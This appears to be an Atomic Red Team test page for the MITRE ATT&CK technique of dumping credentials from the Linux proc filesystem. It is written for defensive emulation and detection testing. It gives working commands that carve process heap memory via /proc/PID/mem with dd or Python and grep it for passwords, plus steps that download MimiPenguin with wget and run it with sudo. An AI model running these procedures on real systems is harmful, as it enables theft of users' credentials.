T1003.007
OS Credential Dumping: Proc Filesystem
Description from ATT&CK
Adversaries may gather credentials from the proc filesystem or 1
/proc
1
/proc/<PID>/maps
1
/proc/<PID>/mem
When executing with root privileges, adversaries can search these memory locations for all processes on a system that contain patterns that are indicative of credentials, such as looking for fixed strings in memory structures or cached hashes. When running without privileged access, processes can still view their own virtual memory locations. Some services or programs may save credentials in clear text inside the process’s memory.(Citation: MimiPenguin GitHub May 2017)(Citation: Polop Linux PrivEsc Gitbook)
If running as or with the permissions of a web browser, a process can search the 1
/maps
1
/mem
Atomic Tests
Atomic Test #1 - Dump individual process memory with sh (Local)
Using 1
/proc/$PID/mem
Supported Platforms: linux
auto_generated_guid: 7e91138a-8e74-456d-a007-973d67a0bb80
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| output_file | Path where captured results will be placed | path | /tmp/T1003.007.bin |
| script_path | Path to script generating the target process | path | /tmp/T1003.007.sh |
| pid_term | Unique string to use to identify target process | string | T1003.007 |
Attack Commands: Run with sh! Elevation Required (e.g. root or admin)
1
2
3
4
5
6
7
8
9
sh #{script_path}
PID=$(pgrep -n -f "#{pid_term}")
HEAP_MEM=$(grep -E "^[0-9a-f-]* r" /proc/"$PID"/maps | grep heap | cut -d' ' -f 1)
MEM_START=$(echo $((0x$(echo "$HEAP_MEM" | cut -d"-" -f1))))
MEM_STOP=$(echo $((0x$(echo "$HEAP_MEM" | cut -d"-" -f2))))
MEM_SIZE=$(echo $((0x$MEM_STOP-0x$MEM_START)))
dd if=/proc/"${PID}"/mem of="#{output_file}" ibs=1 skip="$MEM_START" count="$MEM_SIZE"
grep -i "PASS" "#{output_file}"
Cleanup Commands:
1
2
rm -f "#{output_file}"
Dependencies: Run with sh!
Description: Script to launch target process must exist
Check Prereq Commands:
1
2
3
test -f #{script_path}
grep "#{pid_term}" #{script_path}
Get Prereq Commands:
1
2
3
echo '#!/bin/sh' > #{script_path}
echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path}
Atomic Test #2 - Dump individual process memory with Python (Local)
Using 1
/proc/$PID/mem
Supported Platforms: linux
auto_generated_guid: 437b2003-a20d-4ed8-834c-4964f24eec63
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| output_file | Path where captured results will be placed | path | /tmp/T1003.007.bin |
| script_path | Path to script generating the target process | path | /tmp/T1003.007.sh |
| python_script | Path to script generating the target process | path | PathToAtomicsFolder/T1003.007/src/dump_heap.py |
| pid_term | Unique string to use to identify target process | string | T1003.007 |
Attack Commands: Run with sh! Elevation Required (e.g. root or admin)
1
2
3
4
5
6
sh #{script_path}
PID=$(pgrep -n -f "#{pid_term}")
PYTHON=$(which python || which python3 || which python2)
$PYTHON #{python_script} $PID #{output_file}
grep -i "PASS" "#{output_file}"
Cleanup Commands:
1
2
rm -f "#{output_file}"
Dependencies: Run with sh!
Description: Script to launch target process must exist
Check Prereq Commands:
1
2
3
test -f #{script_path}
grep "#{pid_term}" #{script_path}
Get Prereq Commands:
1
2
3
echo '#!/bin/sh' > #{script_path}
echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path}
Description: Requires Python
Check Prereq Commands:
1
2
(which python || which python3 || which python2)
Get Prereq Commands:
1
2
echo "Python 2.7+ or 3.4+ must be installed"
Atomic Test #3 - Capture Passwords with MimiPenguin
MimiPenguin is a tool inspired by MimiKatz that targets Linux systems affected by CVE-2018-20781 (Ubuntu-based distros and certain versions of GNOME Keyring). Upon successful execution on an affected system, MimiPenguin will retrieve passwords from memory and output them to a specified file. See https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20781. See https://www.tecmint.com/mimipenguin-hack-login-passwords-of-linux-users/#:~:text=Mimipenguin%20is%20a%20free%20and,tested%20on%20various%20Linux%20distributions.
Supported Platforms: linux
auto_generated_guid: a27418de-bdce-4ebd-b655-38f04842bf0c
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| output_file | Path where captured results will be placed | path | /tmp/T1003.007Test3.txt |
| MimiPenguin_Location | Path of MimiPenguin script | path | /tmp/mimipenguin/mimipenguin_2.0-release/mimipenguin.sh |
Attack Commands: Run with bash! Elevation Required (e.g. root or admin)
1
2
3
sudo #{MimiPenguin_Location} > #{output_file}
cat #{output_file}
Cleanup Commands:
1
2
rm -f #{output_file} > /dev/null
Dependencies: Run with sh!
Description: MimiPenguin script must exist on disk at specified location (#{MimiPenguin_Location})
Check Prereq Commands:
1
2
if [ -f "#{MimiPenguin_Location}" ]; then exit 0; else exit 1; fi;
Get Prereq Commands:
1
2
3
4
wget -O "/tmp/mimipenguin.tar.gz" https://github.com/huntergregal/mimipenguin/releases/download/2.0-release/mimipenguin_2.0-release.tar.gz
mkdir /tmp/mimipenguin
tar -xzvf "/tmp/mimipenguin.tar.gz" -C /tmp/mimipenguin
Description: Strings must be installed
Check Prereq Commands:
1
2
if [ -x "$(command -v strings --version)" ]; then exit 0; else exit 1; fi;
Get Prereq Commands:
1
2
sudo apt-get -y install binutils
Description: Python2 must be installed
Check Prereq Commands:
1
2
if [ -x "$(command -v python2 --version)" ]; then exit 0; else exit 1; fi;
Get Prereq Commands:
1
2
sudo apt-get -y install python2
Description: Libc-bin must be installed
Check Prereq Commands:
1
2
if [ -x "$(command -v ldd --version)" ]; then exit 0; else exit 1; fi;
Get Prereq Commands:
1
2
sudo apt-get -y install libc-bin